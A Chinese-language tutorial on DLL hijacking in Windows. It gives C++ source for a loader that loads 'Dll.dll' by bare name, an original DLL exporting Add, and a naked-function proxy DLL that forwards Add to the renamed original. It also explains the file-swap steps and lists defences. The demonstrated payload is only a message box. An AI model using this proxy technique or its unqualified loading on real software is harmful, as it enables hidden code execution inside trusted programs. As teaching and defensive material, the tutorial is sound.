  • DLL劫持技术例子: HijackDll

    控制台程序:DllLoader

    Dll 加载器,用于动态加载目标 Dll 并动态调用其导出函数。注意它传给 LoadLibraryA 的是不带路径的名字 "Dll.dll",因此系统会按 DLL 搜索顺序(应用程序目录优先)查找——这正是下文劫持能够成功的前提。

     1 #include <cstdio>
     2 #include <windows.h>
     3 
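/* Signature of the export we call: int Add(int, int), resolved at run time. */
typedef int (*pAdd) (int a, int b);

/*
 * Demo loader: locate Dll.dll, resolve its exported Add and call it once.
 *
 * NOTE(review): "Dll.dll" is an unqualified name, so LoadLibraryA walks the
 * DLL search order (application directory first).  That weak lookup is what
 * the HijackDll example relies on and is kept on purpose here; a hardened
 * loader would pass a fully-qualified path (or LoadLibraryExA with
 * LOAD_LIBRARY_SEARCH_* flags) and verify the module before trusting it.
 *
 * Returns 0 on success, 1 if the module or the export cannot be resolved.
 */
int main()
{
    /* Reuse an already-mapped instance (no refcount bump) before loading. */
    HMODULE hModule = GetModuleHandleA("Dll.dll");
    if (NULL == hModule)
        hModule = LoadLibraryA("Dll.dll");

    int rc = 0;
    if (NULL == hModule) {
        /* Fix: the original handed a NULL handle straight to GetProcAddress. */
        printf("Failed: cannot load Dll.dll (error %lu)\n", GetLastError());
        rc = 1;
    } else {
        pAdd Add = (pAdd)GetProcAddress(hModule, "Add");
        if (NULL == Add) {
            printf("Failed\n");
            rc = 1;
        } else {
            printf("Succeed\n1 + 1 = %d\n", Add(1, 1));
        }
    }

    /* Keep the console open.  getchar() replaces system("pause > nul"):
     * system() spawns cmd.exe through %COMSPEC%, i.e. one more
     * environment-controlled lookup that does not belong in a loader demo. */
    (void)getchar();
    return rc;
}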
    main.cpp

    原Dll:Dll

    很简单的一个 Dll,只导出一个函数 Add(extern "C" + __declspec(dllexport),未经名字修饰),仅仅做一次加法。

     1 #include <cstdio>
     2 #include <windows.h>
     3 
     4 #define EXTERNC extern "C"
     5 #define EXPORT __declspec(dllexport)
     6 #define ECEP EXTERNC EXPORT
     7 
/*
 * DLL entry point: shows a message box on process attach and detach so the
 * demo makes visible which module the loader actually mapped.
 *
 * NOTE(review): MessageBoxA (user32) is called while the loader lock is held;
 * Microsoft's DllMain guidance warns against calling into user32 from here.
 * Acceptable for a demo, not a pattern to copy.  Thread notifications are
 * ignored; hinstDLL and lpvReserved are unused.  Always returns TRUE.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;

    const char *caption = NULL;
    if (fdwReason == DLL_PROCESS_ATTACH)
        caption = "Attach";
    else if (fdwReason == DLL_PROCESS_DETACH)
        caption = "Detach";

    if (caption != NULL)
        MessageBoxA(NULL, caption, "", MB_ICONINFORMATION);

    return TRUE;
}
    24 
/*
 * Exported, undecorated (extern "C") addition: returns a + b.
 * Plain int arithmetic, so an overflowing sum is undefined behaviour --
 * unchanged from the original; this is the function the hijack forwards to.
 */
ECEP int Add(int a, int b)
{
    int sum = a;
    sum += b;
    return sum;
}
    main.cpp

    劫持Dll:HijackDll

    用于劫持原Dll,并转发原程序的动态调用

     1 //last code by gwsbhqt at 20150727
     2 
     3 #include <cstdio>
     4 #include <windows.h>
     5 
     6 #define EXTERNC extern "C"
     7 #define NAKED __declspec(naked)
     8 #define EXPORT __declspec(dllexport)
     9 #define ECEP EXTERNC EXPORT
    10 #define ENCDECL EXTERNC NAKED void __cdecl
    11 #define EENSTD EXTERNC EXPORT NAKED void __stdcall
    12 #define EENFAST EXTERNC EXPORT NAKED void __fastcall
    13 #define ENDEF ENCDECL
    14 
/*
 * Body of a forwarding stub for a __declspec(naked) export.
 *
 * Resolves lpModuleName -- via GetModuleHandleA first, so only the very
 * first call (module not yet mapped) goes through LoadLibraryA and bumps the
 * refcount -- and jumps to hProcName in that module.  Because the stub is
 * naked, the caller's arguments and return address are still on the stack,
 * so the target runs as if it had been called directly.
 *
 * NOTE(review): `JMP EAX` assumes EAX still holds GetProcAddress's return
 * value when the `if` body executes.  That is x86 codegen behaviour, not a
 * language guarantee; MSVC inline __asm and naked functions are x86-only.
 * If GetProcAddress returns NULL nothing here returns to the caller -- the
 * naked function has no epilog and falls off its end.  hModule is declared
 * without an initialiser, presumably because MSVC forbids initialised
 * function-scope locals in naked functions (confirm against the docs).  The
 * module name is itself unqualified, so the same DLL search order applies.
 */
#define JMPFARPROC(lpModuleName, hProcName) \
    HMODULE hModule; \
    hModule = GetModuleHandleA((lpModuleName)); \
    if (NULL == hModule) hModule = LoadLibraryA((lpModuleName)); \
    if (NULL != GetProcAddress(hModule, (hProcName))) __asm JMP EAX;
    20 
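/* Export the stub under the plain name "Add" (ordinal 1): ENDEF carries no
 * __declspec(dllexport), and _Add is the decorated __cdecl symbol. */
#pragma comment (linker, "/EXPORT:Add=_Add,@1")

/*
 * Hijacked Add: forwards the call unchanged to Add in the renamed original
 * module ("Dll.tmp").  Naked + __cdecl: no prolog/epilog, so the caller's
 * arguments and return address stay put and the real Add returns straight
 * to the original caller.
 *
 * Fix: the original stub had no code after JMPFARPROC, so when the target
 * could not be resolved execution fell off the end of a naked function.
 * The trailing RET returns to the caller instead, with EAX as GetProcAddress
 * left it (NULL, so the call observes 0).  __cdecl callers clean up their
 * own arguments, which is why a bare RET is correct here.  x86 / MSVC only.
 */
ENDEF Add()
{
    JMPFARPROC("Dll.tmp", "Add");
    __asm RET;
}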
    27 
/*
 * Entry point of the hijacking DLL: announces attach/detach with a message
 * box so the demo proves the proxy, not the original, was loaded.
 *
 * NOTE(review): same loader-lock caveat as the original Dll -- user32 calls
 * from DllMain are discouraged by Microsoft's guidance; kept for the demo.
 * Thread notifications are ignored.  Always returns TRUE.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;

    const char *caption = NULL;
    if (fdwReason == DLL_PROCESS_ATTACH)
        caption = "Hijack Dll Attach";
    else if (fdwReason == DLL_PROCESS_DETACH)
        caption = "Hijack Dll Detach";

    if (caption != NULL)
        MessageBoxA(NULL, caption, "", MB_ICONINFORMATION);

    return TRUE;
}
    main.cpp

    此处的宏 JMPFARPROC 看起来似乎每次转发都会重新加载一次模块,其实不会:先用 GetModuleHandle 取已加载模块的句柄,它不增加引用计数;只有第一次(模块尚未加载时)才走 LoadLibraryA。另外要注意,`JMP EAX` 依赖 GetProcAddress 的返回值此刻仍在 EAX 中,这是 x86 调用约定加编译器生成代码的结果而非语言保证;naked 函数和 `__asm` 仅在 MSVC x86 下可用。

    所以即使是大量的转发,也不会出现句柄泄漏——只有首次 LoadLibraryA 增加的那一次引用会一直保留到进程退出,这是有意为之。但若 GetProcAddress 失败,宏之后没有任何收尾指令,naked 函数会直接"掉出"函数体,这是原始代码的一个缺陷。

    都是些很简单的代码,仔细认真看看就好了

    测试是只需要新建一个工程,工程下新建三个项目,分别是一个控制台程序和两个动态链接库,

    在每个项目新建 main.cpp 文件,将代码贴入,生成工程之后,在 Debug/Release 文件夹下,将 Dll.dll 更名为 Dll.tmp,将 HijackDll.dll 更名为 Dll.dll。这一步之所以生效,是因为 LoadLibraryA("Dll.dll") 先在程序所在目录查找。防御侧对应的做法是:用完整路径加载、用 LoadLibraryEx / SetDefaultDllDirectories 收窄搜索范围,并对加载的模块做签名校验。

    即可完成Dll劫持...
